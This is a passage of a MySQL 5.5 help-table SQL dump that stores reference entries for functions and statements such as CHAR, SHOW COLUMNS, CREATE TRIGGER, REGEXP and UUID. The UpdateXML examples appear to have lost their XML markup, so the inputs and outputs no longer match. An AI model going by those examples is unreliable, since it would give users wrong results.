zero-dimensional objects.\n\no Curve represents one-dimensional objects, and has subclass\n LineString, with sub-subclasses Line and LinearRing.\n\no Surface is designed for two-dimensional objects and has subclass\n Polygon.\n\no GeometryCollection has specialized zero-, one-, and two-dimensional\n collection classes named MultiPoint, MultiLineString, and\n MultiPolygon for modeling geometries corresponding to collections of\n Points, LineStrings, and Polygons, respectively. MultiCurve and\n MultiSurface are introduced as abstract superclasses that generalize\n the collection interfaces to handle Curves and Surfaces.\n\nGeometry, Curve, Surface, MultiCurve, and MultiSurface are defined as\nnoninstantiable classes. They define a common set of methods for their\nsubclasses and are included for extensibility.\n\nPoint, LineString, Polygon, GeometryCollection, MultiPoint,\nMultiLineString, and MultiPolygon are instantiable classes.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-geometry-class-hierarchy.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-geometry-class-hierarchy.html'),(14,'CHAR FUNCTION',38,'Syntax:\nCHAR(N,... [USING charset_name])\n\nCHAR() interprets each argument N as an integer and returns a string\nconsisting of the characters given by the code values of those\nintegers. NULL values are skipped.\nBy default, CHAR() returns a binary string. To produce a string in a\ngiven character set, use the optional USING clause:\n\nmysql> SELECT CHARSET(CHAR(0x65)), CHARSET(CHAR(0x65 USING utf8));\n+---------------------+--------------------------------+\n| CHARSET(CHAR(0x65)) | CHARSET(CHAR(0x65 USING utf8)) |\n+---------------------+--------------------------------+\n| binary | utf8 |\n+---------------------+--------------------------------+\n\nIf USING is given and the result string is illegal for the given\ncharacter set, a warning is issued. Also, if strict SQL mode is\nenabled, the result from CHAR() becomes NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT CHAR(77,121,83,81,\'76\');\n -> \'MySQL\'\nmysql> SELECT CHAR(77,77.3,\'77.3\');\n -> \'MMM\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(15,'DATETIME',23,'DATETIME\n\nA date and time combination. The supported range is \'1000-01-01\n00:00:00\' to \'9999-12-31 23:59:59\'. MySQL displays DATETIME values in\n\'YYYY-MM-DD HH:MM:SS\' format, but permits assignment of values to\nDATETIME columns using either strings or numbers.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html'),(16,'SHOW CREATE TRIGGER',27,'Syntax:\nSHOW CREATE TRIGGER trigger_name\n\nThis statement shows the CREATE TRIGGER statement that creates the\nnamed trigger.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-create-trigger.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-create-trigger.html'),(17,'SHOW CREATE PROCEDURE',27,'Syntax:\nSHOW CREATE PROCEDURE proc_name\n\nThis statement is a MySQL extension. It returns the exact string that\ncan be used to re-create the named stored procedure. A similar\nstatement, SHOW CREATE FUNCTION, displays information about stored\nfunctions (see [HELP SHOW CREATE FUNCTION]).\n\nTo use either statement, you must be the user named in the routine\nDEFINER clause or have SELECT access to the mysql.proc table. If you do\nnot have privileges for the routine itself, the value displayed for the\nCreate Procedure or Create Function field will be NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-create-procedure.html\n\n','mysql> SHOW CREATE PROCEDURE test.simpleproc\\G\n*************************** 1. row ***************************\n Procedure: simpleproc\n sql_mode:\n Create Procedure: CREATE PROCEDURE `simpleproc`(OUT param1 INT)\n BEGIN\n SELECT COUNT(*) INTO param1 FROM t;\n END\ncharacter_set_client: latin1\ncollation_connection: latin1_swedish_ci\n Database Collation: latin1_swedish_ci\n\nmysql> SHOW CREATE FUNCTION test.hello\\G\n*************************** 1. row ***************************\n Function: hello\n sql_mode:\n Create Function: CREATE FUNCTION `hello`(s CHAR(20))\n RETURNS CHAR(50)\n RETURN CONCAT(\'Hello, \',s,\'!\')\ncharacter_set_client: latin1\ncollation_connection: latin1_swedish_ci\n Database Collation: latin1_swedish_ci\n','http://dev.mysql.com/doc/refman/5.5/en/show-create-procedure.html'),(18,'OPEN',24,'Syntax:\nOPEN cursor_name\n\nThis statement opens a previously declared cursor. For an example, see\nhttp://dev.mysql.com/doc/refman/5.5/en/cursors.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/open.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/open.html'),(19,'INTEGER',23,'INTEGER[(M)] [UNSIGNED] [ZEROFILL]\n\nThis type is a synonym for INT.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(20,'LOWER',38,'Syntax:\nLOWER(str)\n\nReturns the string str with all characters changed to lowercase\naccording to the current character set mapping. The default is latin1\n(cp1252 West European).\n\nmysql> SELECT LOWER(\'QUADRATICALLY\');\n -> \'quadratically\'\n\nLOWER() (and UPPER()) are ineffective when applied to binary strings\n(BINARY, VARBINARY, BLOB). To perform lettercase conversion, convert\nthe string to a nonbinary string:\n\nmysql> SET @str = BINARY \'New York\';\nmysql> SELECT LOWER(@str), LOWER(CONVERT(@str USING latin1));\n+-------------+-----------------------------------+\n| LOWER(@str) | LOWER(CONVERT(@str USING latin1)) |\n+-------------+-----------------------------------+\n| New York | new york |\n+-------------+-----------------------------------+\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(21,'SHOW COLUMNS',27,'Syntax:\nSHOW [FULL] COLUMNS {FROM | IN} tbl_name [{FROM | IN} db_name]\n [LIKE \'pattern\' | WHERE expr]\n\nSHOW COLUMNS displays information about the columns in a given table.\nIt also works for views. The LIKE clause, if present, indicates which\ncolumn names to match. The WHERE clause can be given to select rows\nusing more general conditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nSHOW COLUMNS displays information only for those columns for which you\nhave some privilege.\n\nmysql> SHOW COLUMNS FROM City;\n+------------+----------+------+-----+---------+----------------+\n| Field | Type | Null | Key | Default | Extra |\n+------------+----------+------+-----+---------+----------------+\n| Id | int(11) | NO | PRI | NULL | auto_increment |\n| Name | char(35) | NO | | | |\n| Country | char(3) | NO | UNI | | |\n| District | char(20) | YES | MUL | | |\n| Population | int(11) | NO | | 0 | |\n+------------+----------+------+-----+---------+----------------+\n5 rows in set (0.00 sec)\n\nIf the data types differ from what you expect them to be based on a\nCREATE TABLE statement, note that MySQL sometimes changes data types\nwhen you create or alter a table. The conditions under which this\noccurs are described in\nhttp://dev.mysql.com/doc/refman/5.5/en/silent-column-changes.html.\n\nThe FULL keyword causes the output to include the column collation and\ncomments, as well as the privileges you have for each column.\n\nYou can use db_name.tbl_name as an alternative to the tbl_name FROM\ndb_name syntax. In other words, these two statements are equivalent:\n\nmysql> SHOW COLUMNS FROM mytable FROM mydb;\nmysql> SHOW COLUMNS FROM mydb.mytable;\n\nSHOW COLUMNS displays the following values for each table column:\n\nField indicates the column name.\n\nType indicates the column data type.\n\nCollation indicates the collation for nonbinary string columns, or NULL\nfor other columns. This value is displayed only if you use the FULL\nkeyword.\n\nThe Null field contains YES if NULL values can be stored in the column,\nNO if not.\n\nThe Key field indicates whether the column is indexed:\n\no If Key is empty, the column either is not indexed or is indexed only\n as a secondary column in a multiple-column, nonunique index.\n\no If Key is PRI, the column is a PRIMARY KEY or is one of the columns\n in a multiple-column PRIMARY KEY.\n\no If Key is UNI, the column is the first column of a UNIQUE index. (A\n UNIQUE index permits multiple NULL values, but you can tell whether\n the column permits NULL by checking the Null field.)\n\no If Key is MUL, the column is the first column of a nonunique index in\n which multiple occurrences of a given value are permitted within the\n column.\n\nIf more than one of the Key values applies to a given column of a\ntable, Key displays the one with the highest priority, in the order\nPRI, UNI, MUL.\n\nA UNIQUE index may be displayed as PRI if it cannot contain NULL values\nand there is no PRIMARY KEY in the table. A UNIQUE index may display as\nMUL if several columns form a composite UNIQUE index; although the\ncombination of the columns is unique, each column can still hold\nmultiple occurrences of a given value.\n\nThe Default field indicates the default value that is assigned to the\ncolumn. This is NULL if the column has an explicit default of NULL, or\nif the column definition has no DEFAULT clause.\n\nThe Extra field contains any additional information that is available\nabout a given column. The value is nonempty in these cases:\nauto_increment for columns that have the AUTO_INCREMENT attribute; on\nupdate CURRENT_TIMESTAMP for TIMESTAMP columns that have the ON UPDATE\nCURRENT_TIMESTAMP attribute.\n\nPrivileges indicates the privileges you have for the column. This value\nis displayed only if you use the FULL keyword.\n\nComment indicates any comment the column has. This value is displayed\nonly if you use the FULL keyword.\n\nSHOW FIELDS is a synonym for SHOW COLUMNS. You can also list a table\'s\ncolumns with the mysqlshow db_name tbl_name command.\n\nThe DESCRIBE statement provides information similar to SHOW COLUMNS.\nSee http://dev.mysql.com/doc/refman/5.5/en/describe.html.\n\nThe SHOW CREATE TABLE, SHOW TABLE STATUS, and SHOW INDEX statements\nalso provide information about tables. See [HELP SHOW].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-columns.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-columns.html'),(22,'CREATE TRIGGER',40,'Syntax:\nCREATE\n [DEFINER = { user | CURRENT_USER }]\n TRIGGER trigger_name\n trigger_time trigger_event\n ON tbl_name FOR EACH ROW\n trigger_body\n\ntrigger_time: { BEFORE | AFTER }\n\ntrigger_event: { INSERT | UPDATE | DELETE }\n\nThis statement creates a new trigger. A trigger is a named database\nobject that is associated with a table, and that activates when a\nparticular event occurs for the table. The trigger becomes associated\nwith the table named tbl_name, which must refer to a permanent table.\nYou cannot associate a trigger with a TEMPORARY table or a view.\n\nTrigger names exist in the schema namespace, meaning that all triggers\nmust have unique names within a schema. Triggers in different schemas\ncan have the same name.\n\nThis section describes CREATE TRIGGER syntax. For additional\ndiscussion, see\nhttp://dev.mysql.com/doc/refman/5.5/en/trigger-syntax.html.\n\nCREATE TRIGGER requires the TRIGGER privilege for the table associated\nwith the trigger. The statement might also require the SUPER privilege,\ndepending on the DEFINER value, as described later in this section. If\nbinary logging is enabled, CREATE TRIGGER might require the SUPER\nprivilege, as described in\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-programs-logging.html.\n\nThe DEFINER clause determines the security context to be used when\nchecking access privileges at trigger activation time, as described\nlater in this section.\n\ntrigger_time is the trigger action time. It can be BEFORE or AFTER to\nindicate that the trigger activates before or after each row to be\nmodified.\n\ntrigger_event indicates the kind of operation that activates the\ntrigger. These trigger_event values are permitted:\n\no INSERT: The trigger activates whenever a new row is inserted into the\n table; for example, through INSERT, LOAD DATA, and REPLACE\n statements.\n\no UPDATE: The trigger activates whenever a row is modified; for\n example, through UPDATE statements.\n\no DELETE: The trigger activates whenever a row is deleted from the\n table; for example, through DELETE and REPLACE statements. DROP TABLE\n and TRUNCATE TABLE statements on the table do not activate this\n trigger, because they do not use DELETE. Dropping a partition does\n not activate DELETE triggers, either.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-trigger.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-trigger.html'),(23,'MONTH',32,'Syntax:\nMONTH(date)\n\nReturns the month for date, in the range 1 to 12 for January to\nDecember, or 0 for dates such as \'0000-00-00\' or \'2008-00-00\' that have\na zero month part.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT MONTH(\'2008-02-03\');\n -> 2\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(24,'TINYINT',23,'TINYINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA very small integer. The signed range is -128 to 127. The unsigned\nrange is 0 to 255.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(25,'SHOW TRIGGERS',27,'Syntax:\nSHOW TRIGGERS [{FROM | IN} db_name]\n [LIKE \'pattern\' | WHERE expr]\n\nSHOW TRIGGERS lists the triggers currently defined for tables in a\ndatabase (the default database unless a FROM clause is given). This\nstatement returns results only for databases and tables for which you\nhave the TRIGGER privilege. The LIKE clause, if present, indicates\nwhich table names to match (not trigger names) and causes the statement\nto display triggers for those tables. The WHERE clause can be given to\nselect rows using more general conditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nFor the trigger ins_sum as defined in\nhttp://dev.mysql.com/doc/refman/5.5/en/triggers.html, the output of\nthis statement is as shown here:\n\nmysql> SHOW TRIGGERS LIKE \'acc%\'\\G\n*************************** 1. row ***************************\n Trigger: ins_sum\n Event: INSERT\n Table: account\n Statement: SET @sum = @sum + NEW.amount\n Timing: BEFORE\n Created: NULL\n sql_mode:\n Definer: myname@localhost\ncharacter_set_client: latin1\ncollation_connection: latin1_swedish_ci\n Database Collation: latin1_swedish_ci\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-triggers.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-triggers.html'),(26,'MASTER_POS_WAIT',14,'Syntax:\nMASTER_POS_WAIT(log_name,log_pos[,timeout])\n\nThis function is useful for control of master/slave synchronization. It\nblocks until the slave has read and applied all updates up to the\nspecified position in the master log. The return value is the number of\nlog events the slave had to wait for to advance to the specified\nposition. The function returns NULL if the slave SQL thread is not\nstarted, the slave\'s master information is not initialized, the\narguments are incorrect, or an error occurs. It returns -1 if the\ntimeout has been exceeded. If the slave SQL thread stops while\nMASTER_POS_WAIT() is waiting, the function returns NULL. If the slave\nis past the specified position, the function returns immediately.\n\nIf a timeout value is specified, MASTER_POS_WAIT() stops waiting when\ntimeout seconds have elapsed. timeout must be greater than 0; a zero or\nnegative timeout means no timeout. The lock is exclusive. While held by\none session, other sessions cannot obtain a lock of the same name.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(27,'ISCLOSED',13,'IsClosed(ls)\n\nFor a LineString value ls, IsClosed() returns 1 if ls is closed (that\nis, its StartPoint() and EndPoint() values are the same) and is simple\n(does not pass through the same point more than once).\n\nFor a MultiLineString value ls, IsClosed() returns 1 if ls is closed\n(that is, the StartPoint() and EndPoint() values are the same for each\nLineString in ls).\n\nIsClosed() returns 0 if ls is not closed, and NULL if ls is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html\n\n','mysql> SET @ls1 = \'LineString(1 1,2 2,3 3,2 2)\';\nmysql> SET @ls2 = \'LineString(1 1,2 2,3 3,1 1)\';\n\nmysql> SELECT IsClosed(GeomFromText(@ls1));\n+------------------------------+\n| IsClosed(GeomFromText(@ls1)) |\n+------------------------------+\n| 0 |\n+------------------------------+\n\nmysql> SELECT IsClosed(GeomFromText(@ls2));\n+------------------------------+\n| IsClosed(GeomFromText(@ls2)) |\n+------------------------------+\n| 1 |\n+------------------------------+\n\nmysql> SET @ls3 = \'MultiLineString((1 1,2 2,3 3),(4 4,5 5))\';\n\nmysql> SELECT IsClosed(GeomFromText(@ls3));\n+------------------------------+\n| IsClosed(GeomFromText(@ls3)) |\n+------------------------------+\n| 0 |\n+------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html'),(28,'REGEXP',38,'Syntax:\nexpr REGEXP pat, expr RLIKE pat\n\nPerforms a pattern match of a string expression expr against a pattern\npat. The pattern can be an extended regular expression, the syntax for\nwhich is discussed later in this section. Returns 1 if expr matches\npat; otherwise it returns 0. If either expr or pat is NULL, the result\nis NULL. RLIKE is a synonym for REGEXP, provided for mSQL\ncompatibility.\n\nThe pattern need not be a literal string. For example, it can be\nspecified as a string expression or table column.\n\n*Note*: Because MySQL uses the C escape syntax in strings (for example,\n\"\\n\" to represent the newline character), you must double any \"\\\" that\nyou use in your REGEXP strings.\n\nREGEXP is not case sensitive, except when used with binary strings.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/regexp.html\n\n','mysql> SELECT \'Monty!\' REGEXP \'.*\';\n -> 1\nmysql> SELECT \'new*\\n*line\' REGEXP \'new\\\\*.\\\\*line\';\n -> 1\nmysql> SELECT \'a\' REGEXP \'A\', \'a\' REGEXP BINARY \'A\';\n -> 1 0\nmysql> SELECT \'a\' REGEXP \'^[a-d]\';\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/regexp.html'),(29,'IF STATEMENT',24,'Syntax:\nIF search_condition THEN statement_list\n [ELSEIF search_condition THEN statement_list] ...\n [ELSE statement_list]\nEND IF\n\nThe IF statement for stored programs implements a basic conditional\nconstruct.\n\n*Note*: There is also an IF() function, which differs from the IF\nstatement described here. See\nhttp://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html. The\nIF statement can have THEN, ELSE, and ELSEIF clauses, and it is\nterminated with END IF.\n\nIf the search_condition evaluates to true, the corresponding THEN or\nELSEIF clause statement_list executes. If no search_condition matches,\nthe ELSE clause statement_list executes.\n\nEach statement_list consists of one or more SQL statements; an empty\nstatement_list is not permitted.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/if.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/if.html'),(30,'^',19,'Syntax:\n^\n\nBitwise XOR:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html\n\n','mysql> SELECT 1 ^ 1;\n -> 0\nmysql> SELECT 1 ^ 0;\n -> 1\nmysql> SELECT 11 ^ 3;\n -> 8\n','http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html'),(31,'DROP VIEW',40,'Syntax:\nDROP VIEW [IF EXISTS]\n view_name [, view_name] ...\n [RESTRICT | CASCADE]\n\nDROP VIEW removes one or more views. You must have the DROP privilege\nfor each view. If any of the views named in the argument list do not\nexist, MySQL returns an error indicating by name which nonexisting\nviews it was unable to drop, but it also drops all of the views in the\nlist that do exist.\n\nThe IF EXISTS clause prevents an error from occurring for views that\ndon\'t exist. When this clause is given, a NOTE is generated for each\nnonexistent view. See [HELP SHOW WARNINGS].\n\nRESTRICT and CASCADE, if given, are parsed and ignored.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-view.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-view.html'),(32,'WITHIN',31,'Within(g1,g2)\n\nReturns 1 or 0 to indicate whether g1 is spatially within g2. This\ntests the opposite relationship as Contains().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html'),(33,'WEEK',32,'Syntax:\nWEEK(date[,mode])\n\nThis function returns the week number for date. The two-argument form\nof WEEK() enables you to specify whether the week starts on Sunday or\nMonday and whether the return value should be in the range from 0 to 53\nor from 1 to 53. If the mode argument is omitted, the value of the\ndefault_week_format system variable is used. See\nhttp://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT WEEK(\'2008-02-20\');\n -> 7\nmysql> SELECT WEEK(\'2008-02-20\',0);\n -> 7\nmysql> SELECT WEEK(\'2008-02-20\',1);\n -> 8\nmysql> SELECT WEEK(\'2008-12-31\',1);\n -> 53\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(34,'SHOW PLUGINS',27,'Syntax:\nSHOW PLUGINS\n\nSHOW PLUGINS displays information about server plugins. Plugin\ninformation is also available in the INFORMATION_SCHEMA.PLUGINS table.\nSee http://dev.mysql.com/doc/refman/5.5/en/plugins-table.html.\n\nExample of SHOW PLUGINS output:\n\nmysql> SHOW PLUGINS\\G\n*************************** 1. row ***************************\n Name: binlog\n Status: ACTIVE\n Type: STORAGE ENGINE\nLibrary: NULL\nLicense: GPL\n*************************** 2. row ***************************\n Name: CSV\n Status: ACTIVE\n Type: STORAGE ENGINE\nLibrary: NULL\nLicense: GPL\n*************************** 3. row ***************************\n Name: MEMORY\n Status: ACTIVE\n Type: STORAGE ENGINE\nLibrary: NULL\nLicense: GPL\n*************************** 4. row ***************************\n Name: MyISAM\n Status: ACTIVE\n Type: STORAGE ENGINE\nLibrary: NULL\nLicense: GPL\n...\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-plugins.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-plugins.html'),(35,'DROP FUNCTION UDF',22,'Syntax:\nDROP FUNCTION function_name\n\nThis statement drops the user-defined function (UDF) named\nfunction_name.\n\nTo drop a function, you must have the DELETE privilege for the mysql\ndatabase. This is because DROP FUNCTION removes a row from the\nmysql.func system table that records the function\'s name, type, and\nshared library name.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-function-udf.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-function-udf.html'),(36,'PREPARE',8,'Syntax:\nPREPARE stmt_name FROM preparable_stmt\n\nThe PREPARE statement prepares a SQL statement and assigns it a name,\nstmt_name, by which to refer to the statement later. The prepared\nstatement is executed with EXECUTE and released with DEALLOCATE\nPREPARE. For examples, see\nhttp://dev.mysql.com/doc/refman/5.5/en/sql-syntax-prepared-statements.h\ntml.\n\nStatement names are not case sensitive. preparable_stmt is either a\nstring literal or a user variable that contains the text of the SQL\nstatement. The text must represent a single statement, not multiple\nstatements. Within the statement, ? characters can be used as parameter\nmarkers to indicate where data values are to be bound to the query\nlater when you execute it. The ? characters should not be enclosed\nwithin quotation marks, even if you intend to bind them to string\nvalues. Parameter markers can be used only where data values should\nappear, not for SQL keywords, identifiers, and so forth.\n\nIf a prepared statement with the given name already exists, it is\ndeallocated implicitly before the new statement is prepared. This means\nthat if the new statement contains an error and cannot be prepared, an\nerror is returned and no statement with the given name exists.\n\nThe scope of a prepared statement is the session within which it is\ncreated, which as several implications:\n\no A prepared statement created in one session is not available to other\n sessions.\n\no When a session ends, whether normally or abnormally, its prepared\n statements no longer exist. If auto-reconnect is enabled, the client\n is not notified that the connection was lost. For this reason,\n clients may wish to disable auto-reconnect. See\n http://dev.mysql.com/doc/refman/5.5/en/auto-reconnect.html.\n\no A prepared statement created within a stored program continues to\n exist after the program finishes executing and can be executed\n outside the program later.\n\no A statement prepared in stored program context cannot refer to stored\n procedure or function parameters or local variables because they go\n out of scope when the program ends and would be unavailable were the\n statement to be executed later outside the program. As a workaround,\n refer instead to user-defined variables, which also have session\n scope; see\n http://dev.mysql.com/doc/refman/5.5/en/user-variables.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/prepare.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/prepare.html'),(37,'LOCK',8,'Syntax:\nLOCK TABLES\n tbl_name [[AS] alias] lock_type\n [, tbl_name [[AS] alias] lock_type] ...\n\nlock_type:\n READ [LOCAL]\n | [LOW_PRIORITY] WRITE\n\nUNLOCK TABLES\n\nMySQL enables client sessions to acquire table locks explicitly for the\npurpose of cooperating with other sessions for access to tables, or to\nprevent other sessions from modifying tables during periods when a\nsession requires exclusive access to them. A session can acquire or\nrelease locks only for itself. One session cannot acquire locks for\nanother session or release locks held by another session.\n\nLocks may be used to emulate transactions or to get more speed when\nupdating tables. This is explained in more detail later in this\nsection.\n\nLOCK TABLES explicitly acquires table locks for the current client\nsession. Table locks can be acquired for base tables or views. You must\nhave the LOCK TABLES privilege, and the SELECT privilege for each\nobject to be locked.\n\nFor view locking, LOCK TABLES adds all base tables used in the view to\nthe set of tables to be locked and locks them automatically. If you\nlock a table explicitly with LOCK TABLES, any tables used in triggers\nare also locked implicitly, as described in\nhttp://dev.mysql.com/doc/refman/5.5/en/lock-tables-and-triggers.html.\n\nUNLOCK TABLES explicitly releases any table locks held by the current\nsession. LOCK TABLES implicitly releases any table locks held by the\ncurrent session before acquiring new locks.\n\nAnother use for UNLOCK TABLES is to release the global read lock\nacquired with the FLUSH TABLES WITH READ LOCK statement, which enables\nyou to lock all tables in all databases. See [HELP FLUSH]. (This is a\nvery convenient way to get backups if you have a file system such as\nVeritas that can take snapshots in time.)\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/lock-tables.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/lock-tables.html'),(38,'UPDATEXML',38,'Syntax:\nUpdateXML(xml_target, xpath_expr, new_xml)\n\nThis function replaces a single portion of a given fragment of XML\nmarkup xml_target with a new XML fragment new_xml, and then returns the\nchanged XML. The portion of xml_target that is replaced matches an\nXPath expression xpath_expr supplied by the user. In MySQL 5.5, the\nXPath expression can contain at most 127 characters. (This limitation\nis lifted in MySQL 5.6.)\n\nIf no expression matching xpath_expr is found, or if multiple matches\nare found, the function returns the original xml_target XML fragment.\nAll three arguments should be strings.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/xml-functions.html\n\n','mysql> SELECT\n -> UpdateXML(\'ccc\', \'/a\', \'fff\') AS val1,\n -> UpdateXML(\'ccc\', \'/b\', \'fff\') AS val2,\n -> UpdateXML(\'ccc\', \'//b\', \'fff\') AS val3,\n -> UpdateXML(\'ccc\', \'/a/d\', \'fff\') AS val4,\n -> UpdateXML(\'ccc\', \'/a/d\', \'fff\') AS val5\n -> \\G\n\n*************************** 1. row ***************************\nval1: fff\nval2: ccc\nval3: fff\nval4: cccfff\nval5: ccc\n','http://dev.mysql.com/doc/refman/5.5/en/xml-functions.html'),(39,'RESET SLAVE',8,'Syntax:\nRESET SLAVE [ALL]\n\nRESET SLAVE makes the slave forget its replication position in the\nmaster\'s binary log. This statement is meant to be used for a clean\nstart: It deletes the master.info and relay-log.info files, all the\nrelay log files, and starts a new relay log file. To use RESET SLAVE,\nthe slave replication threads must be stopped (use STOP SLAVE if\nnecessary).\n\n*Note*: All relay log files are deleted, even if they have not been\ncompletely executed by the slave SQL thread. (This is a condition\nlikely to exist on a replication slave if you have issued a STOP SLAVE\nstatement or if the slave is highly loaded.)\n\nIn MySQL 5.5 (unlike the case in MySQL 5.1 and earlier), RESET SLAVE\ndoes not change any replication connection parameters such as master\nhost, master port, master user, or master password, which are retained\nin memory. This means that START SLAVE can be issued without requiring\na CHANGE MASTER TO statement following RESET SLAVE.\n\nConnection parameters are reset if the slave mysqld is shut down\nfollowing RESET SLAVE. In MySQL 5.5.16 and later, you can instead use\nRESET SLAVE ALL to reset these connection parameters (Bug #11809016).\n\nRESET SLAVE ALL does not clear the IGNORE_SERVER_IDS list set by CHANGE\nMASTER TO. This issue is fixed in MySQL 5.7. (Bug #18816897)\n\nIf the slave SQL thread was in the middle of replicating temporary\ntables when it was stopped, and RESET SLAVE is issued, these replicated\ntemporary tables are deleted on the slave.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/reset-slave.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/reset-slave.html'),(40,'SHOW BINARY LOGS',27,'Syntax:\nSHOW BINARY LOGS\nSHOW MASTER LOGS\n\nLists the binary log files on the server. This statement is used as\npart of the procedure described in [HELP PURGE BINARY LOGS], that shows\nhow to determine which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-binary-logs.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-binary-logs.html'),(41,'POLYGON',25,'Polygon(ls1,ls2,...)\n\nConstructs a Polygon value from a number of LineString or WKB\nLineString arguments. If any argument does not represent a LinearRing\n(that is, not a closed and simple LineString), the return value is\nNULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html'),(42,'MINUTE',32,'Syntax:\nMINUTE(time)\n\nReturns the minute for time, in the range 0 to 59.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT MINUTE(\'2008-02-03 10:05:03\');\n -> 5\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(43,'DAY',32,'Syntax:\nDAY(date)\n\nDAY() is a synonym for DAYOFMONTH().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(44,'MID',38,'Syntax:\nMID(str,pos,len)\n\nMID(str,pos,len) is a synonym for SUBSTRING(str,pos,len).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(45,'UUID',14,'Syntax:\nUUID()\n\nReturns a Universal Unique Identifier (UUID) generated according to\n\"DCE 1.1: Remote Procedure Call\" (Appendix A) CAE (Common Applications\nEnvironment) Specifications published by The Open Group in October 1997\n(Document Number C706,\nhttp://www.opengroup.org/public/pubs/catalog/c706.htm).\n\nA UUID is designed as a number that is globally unique in space and\ntime. Two calls to UUID() are expected to generate two different\nvalues, even if these calls are performed on two separate computers\nthat are not connected to each other.\n\nA UUID is a 128-bit number represented by a utf8 string of five\nhexadecimal numbers in aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee format:\n\no The first three numbers are generated from a timestamp.\n\no The fourth number preserves temporal uniqueness in case the timestamp\n value loses monotonicity (for example, due to daylight saving time).\n\no The fifth number is an IEEE 802 node number that provides spatial\n uniqueness. A random number is substituted if the latter is not\n available (for example, because the host computer has no Ethernet\n card, or we do not know how to find the hardware address of an\n interface on your operating system). In this case, spatial uniqueness\n cannot be guaranteed. Nevertheless, a collision should have very low\n probability.\n\n Currently, the MAC address of an interface is taken into account only\n on FreeBSD and Linux. On other operating systems, MySQL uses a\n randomly generated 48-bit number.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','mysql> SELECT 